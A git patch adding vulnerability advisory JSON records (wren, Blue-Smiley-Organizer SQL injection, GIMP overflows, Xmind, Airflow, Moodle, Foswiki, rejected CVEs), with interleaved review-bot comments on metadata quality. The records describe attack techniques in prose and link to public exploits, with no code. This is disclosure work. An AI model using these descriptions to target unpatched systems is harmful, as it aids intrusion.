+ "details": "A vulnerability was identified in wren-lang wren up to 0.4.0. This affects the function peekChar of the file src/vm/wren_compiler.c of the component Source File Parser. Such manipulation leads to out-of-bounds read. The attack needs to be performed locally. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2858"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/wren-lang/wren/issues/1217"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/oneafter/0122/blob/main/i1217/repro"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/wren-lang/wren"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347097"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347097"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754489"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T22:16:30Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-w9fh-vjwm-p6c4/GHSA-w9fh-vjwm-p6c4.json b/advisories/unreviewed/2026/02/GHSA-w9fh-vjwm-p6c4/GHSA-w9fh-vjwm-p6c4.json
new file mode 100644
index 0000000000000..bcebc42dd1ebc
--- /dev/null
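Review bot: `cwe_ids` in GHSA-vm4c-6g35-79xf lists the class-level `"CWE-119"`, while the `details` text names the outcome as an out-of-bounds read in `peekChar`; `"CWE-125"` is the specific weakness for that and gives better results in CWE-based triage. The `CVSS_V3` vector (`AV:L`, `PR:L`, impact `A:L` only) works out to a Low base score, so the `"severity": "MODERATE"` label presumably follows the v4.0 vector instead. Anyone thresholding on the label rather than on a computed score should be aware of that difference.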
+++ b/advisories/unreviewed/2026/02/GHSA-w9fh-vjwm-p6c4/GHSA-w9fh-vjwm-p6c4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w9fh-vjwm-p6c4", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25431" + ], + "details": "delpino73 Blue-Smiley-Organizer 1.32 contains an SQL injection vulnerability in the datetime parameter that allows unauthenticated attackers to manipulate database queries. Attackers can inject SQL code through POST requests to extract sensitive data using boolean-based blind and time-based blind techniques, or write files to the server using INTO OUTFILE statements.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25431" + }, + { + "type": "WEB", + "url": "https://github.com/delpino73/Blue-Smiley-Organizer" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47550" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/delpino-blue-smiley-organizer-sql-injection-via-datetime" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wx92-h8q5-hfm6/GHSA-wx92-h8q5-hfm6.json b/advisories/unreviewed/2026/02/GHSA-wx92-h8q5-hfm6/GHSA-wx92-h8q5-hfm6.json new file mode 100644 index 0000000000000..5c7e3f33253fb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wx92-h8q5-hfm6/GHSA-wx92-h8q5-hfm6.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wx92-h8q5-hfm6", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2045" + ], + "details": "GIMP XWD File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of XWD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28265.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2045" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/gimp/-/commit/68b27dfb1cbd9b3f22d7fa624dbab8647ee5f275" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-119" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xhcq-9mcp-rrvr/GHSA-xhcq-9mcp-rrvr.json b/advisories/unreviewed/2026/02/GHSA-xhcq-9mcp-rrvr/GHSA-xhcq-9mcp-rrvr.json new file mode 100644 index 0000000000000..58c39b42e59a2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xhcq-9mcp-rrvr/GHSA-xhcq-9mcp-rrvr.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xhcq-9mcp-rrvr", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2047" + ], + "details": "GIMP ICNS File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of ICNS files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28530.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2047" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/gimp/-/merge_requests/2600/diffs?commit_id=dd2faac351f1ff2588529fedc606e6a5f815577c" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-120" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xwhr-hxqf-pv44/GHSA-xwhr-hxqf-pv44.json b/advisories/unreviewed/2026/02/GHSA-xwhr-hxqf-pv44/GHSA-xwhr-hxqf-pv44.json new file mode 100644 index 0000000000000..0fcb203fa5f4b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xwhr-hxqf-pv44/GHSA-xwhr-hxqf-pv44.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwhr-hxqf-pv44", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2026-0777" + ], + "details": "Xmind Attachment Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Xmind. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of attachments. When opening an attachment, the user interface fails to warn the user of unsafe actions. An attacker can leverage this vulnerability to execute code in the context of current user. Was ZDI-CAN-26034.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0777" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-069" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-356" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T22:16:19Z" + } +} \ No newline at end of file From 4a25af68e5b6006b29ed19b7cd19109647ff538f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 03:32:59 +0000 Subject: [PATCH 33/77] Publish GHSA-gfw7-2v73-69wg --- .../GHSA-gfw7-2v73-69wg.json | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json diff --git a/advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json b/advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json new file mode 100644 index 0000000000000..573b55331f43f 
--- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gfw7-2v73-69wg", + "modified": "2026-02-21T03:31:39Z", + "published": "2026-02-21T03:31:39Z", + "aliases": [ + "CVE-2025-65995" + ], + "details": "When a DAG failed during parsing, Airflow’s error-reporting in the UI could include the full kwargs passed to the operators. If those kwargs contained sensitive values (such as secrets), they might be exposed in the UI tracebacks to authenticated users who had permission to view that DAG. \n\nThe issue has been fixed in Airflow 3.1.4 and 2.11.1, and users are strongly advised to upgrade to prevent potential disclosure of sensitive information.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65995" + }, + { + "type": "WEB", + "url": "https://github.com/apache/airflow/pull/58252" + }, + { + "type": "WEB", + "url": "https://github.com/apache/airflow/pull/61883" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/1qzlrjo2wmlzs0rrgzgslj2pzkor0dr2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2025/12/12/2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-209" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T03:15:57Z" + } +} \ No newline at end of file From 715a73bb5198ef53c08636e9663bfd904ab59ff1 Mon Sep 17 00:00:00 2001 
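Review bot: GHSA-gfw7-2v73-69wg is published with `"severity": []`, a `database_specific` `"severity": null` and `"affected": []`, even though its `details` text names the fixed releases (Airflow 3.1.4 and 2.11.1). With no package or version range in `affected`, dependency scanners that match on ranges will not flag vulnerable installations from this record, and severity-threshold filters will pass over it. Until the entry is reviewed, consumers have to take the fixed versions from the prose; a reviewed entry would carry an `affected` range with a `fixed` event for each of the two release lines.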
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 06:32:03 +0000 Subject: [PATCH 34/77] Publish Advisories GHSA-m4f3-qp2w-gwh6 GHSA-4782-773j-qvcq GHSA-4g4j-v56v-2w79 GHSA-6v46-p4rh-797h GHSA-7fj8-2w2v-gvp9 GHSA-96j8-mwhp-xmj4 GHSA-c7x9-pfw8-h942 GHSA-cg8j-5cr2-568q GHSA-chwj-wc69-jqxj GHSA-f678-w5rv-9j99 GHSA-ggxq-2mg9-8966 GHSA-rx5p-47h9-9hv2 GHSA-vjq9-53r9-j2x9 GHSA-w8g9-9cxr-c95j GHSA-x835-c867-m9pw --- .../GHSA-m4f3-qp2w-gwh6.json | 6 +- .../GHSA-4782-773j-qvcq.json | 25 ++++++++ .../GHSA-4g4j-v56v-2w79.json | 40 +++++++++++++ .../GHSA-6v46-p4rh-797h.json | 25 ++++++++ .../GHSA-7fj8-2w2v-gvp9.json | 60 +++++++++++++++++++ .../GHSA-96j8-mwhp-xmj4.json | 56 +++++++++++++++++ .../GHSA-c7x9-pfw8-h942.json | 25 ++++++++ .../GHSA-cg8j-5cr2-568q.json | 40 +++++++++++++ .../GHSA-chwj-wc69-jqxj.json | 25 ++++++++ .../GHSA-f678-w5rv-9j99.json | 25 ++++++++ .../GHSA-ggxq-2mg9-8966.json | 40 +++++++++++++ .../GHSA-rx5p-47h9-9hv2.json | 25 ++++++++ .../GHSA-vjq9-53r9-j2x9.json | 25 ++++++++ .../GHSA-w8g9-9cxr-c95j.json | 25 ++++++++ .../GHSA-x835-c867-m9pw.json | 56 +++++++++++++++++ 15 files changed, 497 insertions(+), 1 deletion(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-4782-773j-qvcq/GHSA-4782-773j-qvcq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4g4j-v56v-2w79/GHSA-4g4j-v56v-2w79.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6v46-p4rh-797h/GHSA-6v46-p4rh-797h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7fj8-2w2v-gvp9/GHSA-7fj8-2w2v-gvp9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-96j8-mwhp-xmj4/GHSA-96j8-mwhp-xmj4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c7x9-pfw8-h942/GHSA-c7x9-pfw8-h942.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cg8j-5cr2-568q/GHSA-cg8j-5cr2-568q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-chwj-wc69-jqxj/GHSA-chwj-wc69-jqxj.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-f678-w5rv-9j99/GHSA-f678-w5rv-9j99.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ggxq-2mg9-8966/GHSA-ggxq-2mg9-8966.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rx5p-47h9-9hv2/GHSA-rx5p-47h9-9hv2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vjq9-53r9-j2x9/GHSA-vjq9-53r9-j2x9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w8g9-9cxr-c95j/GHSA-w8g9-9cxr-c95j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x835-c867-m9pw/GHSA-x835-c867-m9pw.json diff --git a/advisories/github-reviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json b/advisories/github-reviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json index 791cac995443a..1db9a4e9fbe6d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json +++ b/advisories/github-reviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m4f3-qp2w-gwh6", - "modified": "2026-02-19T20:27:55Z", + "modified": "2026-02-21T06:30:15Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-24708" @@ -90,6 +90,10 @@ "type": "PACKAGE", "url": "https://github.com/openstack/nova" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00025.html" + }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2026/02/17/7" diff --git a/advisories/unreviewed/2026/02/GHSA-4782-773j-qvcq/GHSA-4782-773j-qvcq.json b/advisories/unreviewed/2026/02/GHSA-4782-773j-qvcq/GHSA-4782-773j-qvcq.json new file mode 100644 index 0000000000000..ba5d530c52d6c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4782-773j-qvcq/GHSA-4782-773j-qvcq.json 
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4782-773j-qvcq",
+ "modified": "2026-02-21T06:30:15Z",
+ "published": "2026-02-21T06:30:15Z",
+ "aliases": [
+ "CVE-2026-27530"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27530"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T05:17:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4g4j-v56v-2w79/GHSA-4g4j-v56v-2w79.json b/advisories/unreviewed/2026/02/GHSA-4g4j-v56v-2w79/GHSA-4g4j-v56v-2w79.json
new file mode 100644
index 0000000000000..13734acd5f398
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4g4j-v56v-2w79/GHSA-4g4j-v56v-2w79.json
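Review bot: The `details` of GHSA-4782-773j-qvcq is only `Rejected reason: Not used`, with empty `severity` and `affected`, yet nothing in the record marks it as retired, so a consumer of the unreviewed feed sees it as a live advisory for CVE-2026-27530. The OSV schema has a `withdrawn` timestamp for this case; adding `"withdrawn": "<RFC 3339 time of rejection>"` would let scanners drop the record without string-matching the details text. The same applies to the other rejected records in this patch: GHSA-6v46-p4rh-797h, GHSA-c7x9-pfw8-h942, GHSA-chwj-wc69-jqxj, GHSA-f678-w5rv-9j99, GHSA-rx5p-47h9-9hv2, GHSA-vjq9-53r9-j2x9 and GHSA-w8g9-9cxr-c95j.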
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4g4j-v56v-2w79",
+ "modified": "2026-02-21T06:30:16Z",
+ "published": "2026-02-21T06:30:16Z",
+ "aliases": [
+ "CVE-2026-26046"
+ ],
+ "details": "A vulnerability was found in a Moodle TeX filter administrative setting where insufficient sanitization of configuration input could allow command injection. On sites where the TeX filter is enabled and ImageMagick is installed, a maliciously crafted setting value entered by an administrator could result in unintended system command execution. While exploitation requires administrative privileges, successful compromise could affect the entire Moodle server.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26046"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2026-26046"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440903"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T06:17:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-6v46-p4rh-797h/GHSA-6v46-p4rh-797h.json b/advisories/unreviewed/2026/02/GHSA-6v46-p4rh-797h/GHSA-6v46-p4rh-797h.json
new file mode 100644
index 0000000000000..40f043cc37639
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-6v46-p4rh-797h/GHSA-6v46-p4rh-797h.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6v46-p4rh-797h",
+ "modified": "2026-02-21T06:30:15Z",
+ "published": "2026-02-21T06:30:15Z",
+ "aliases": [
+ "CVE-2026-27527"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27527"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T05:17:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-7fj8-2w2v-gvp9/GHSA-7fj8-2w2v-gvp9.json b/advisories/unreviewed/2026/02/GHSA-7fj8-2w2v-gvp9/GHSA-7fj8-2w2v-gvp9.json
new file mode 100644
index 0000000000000..5a24de2a6c271
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-7fj8-2w2v-gvp9/GHSA-7fj8-2w2v-gvp9.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7fj8-2w2v-gvp9",
+ "modified": "2026-02-21T06:30:17Z",
+ "published": "2026-02-21T06:30:17Z",
+ "aliases": [
+ "CVE-2026-2861"
+ ],
+ "details": "A vulnerability was detected in Foswiki up to 2.1.10. The affected element is an unknown function of the component Changes/Viewfile/Oops. The manipulation results in information disclosure. It is possible to launch the attack remotely. The exploit is now public and may be used. Upgrading to version 2.1.11 is sufficient to fix this issue. The patch is identified as 31aeecb58b64/d8ed86b10e46. Upgrading the affected component is recommended.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2861"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/foswiki/distro/commit/31aeecb58b64"
+ },
+ {
+ "type": "WEB",
+ "url": "https://foswiki.org/Tasks/Item15600"
+ },
+ {
+ "type": "WEB",
+ "url": "https://foswiki.org/Tasks/Item15601"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347101"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347101"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.753966"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T06:17:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-96j8-mwhp-xmj4/GHSA-96j8-mwhp-xmj4.json b/advisories/unreviewed/2026/02/GHSA-96j8-mwhp-xmj4/GHSA-96j8-mwhp-xmj4.json
new file mode 100644
index 0000000000000..5af216df18918
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-96j8-mwhp-xmj4/GHSA-96j8-mwhp-xmj4.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-96j8-mwhp-xmj4",
+ "modified": "2026-02-21T06:30:16Z",
+ "published": "2026-02-21T06:30:16Z",
+ "aliases": [
+ "CVE-2026-2860"
+ ],
+ "details": "A security vulnerability has been detected in feng_ha_ha/megagao ssm-erp and production_ssm up to 4288d53bd35757b27f2d070057aefb2c07bdd097. Impacted is an unknown function of the file EmployeeController.java. The manipulation leads to improper authorization. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. This product is distributed under two entirely different names. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2860"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/megagao/production_ssm/issues/36"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/megagao/production_ssm/issues/36#issue-3914626431"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347100"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347100"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754494"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-266"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T05:17:30Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-c7x9-pfw8-h942/GHSA-c7x9-pfw8-h942.json b/advisories/unreviewed/2026/02/GHSA-c7x9-pfw8-h942/GHSA-c7x9-pfw8-h942.json
new file mode 100644
index 0000000000000..6a2c0cd82fe5b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-c7x9-pfw8-h942/GHSA-c7x9-pfw8-h942.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c7x9-pfw8-h942",
+ "modified": "2026-02-21T06:30:15Z",
+ "published": "2026-02-21T06:30:15Z",
+ "aliases": [
+ "CVE-2026-27528"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27528"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T05:17:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-cg8j-5cr2-568q/GHSA-cg8j-5cr2-568q.json b/advisories/unreviewed/2026/02/GHSA-cg8j-5cr2-568q/GHSA-cg8j-5cr2-568q.json
new file mode 100644
index 0000000000000..1fc1fdf7fde09
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-cg8j-5cr2-568q/GHSA-cg8j-5cr2-568q.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cg8j-5cr2-568q",
+ "modified": "2026-02-21T06:30:16Z",
+ "published": "2026-02-21T06:30:16Z",
+ "aliases": [
+ "CVE-2026-26047"
+ ],
+ "details": "A denial-of-service vulnerability was identified in Moodle’s TeX formula editor. When rendering TeX content using mimetex, insufficient execution time limits could allow specially crafted formulas to consume excessive server resources. An authenticated user could abuse this behavior to degrade performance or cause service interruption.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26047"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2026-26047"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440905"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-400"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T06:17:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-chwj-wc69-jqxj/GHSA-chwj-wc69-jqxj.json b/advisories/unreviewed/2026/02/GHSA-chwj-wc69-jqxj/GHSA-chwj-wc69-jqxj.json
new file mode 100644
index 0000000000000..b6b8c4365a4eb
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-chwj-wc69-jqxj/GHSA-chwj-wc69-jqxj.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-chwj-wc69-jqxj",
+ "modified": "2026-02-21T06:30:16Z",
+ "published": "2026-02-21T06:30:16Z",
+ "aliases": [
+ "CVE-2026-27531"
+ ],
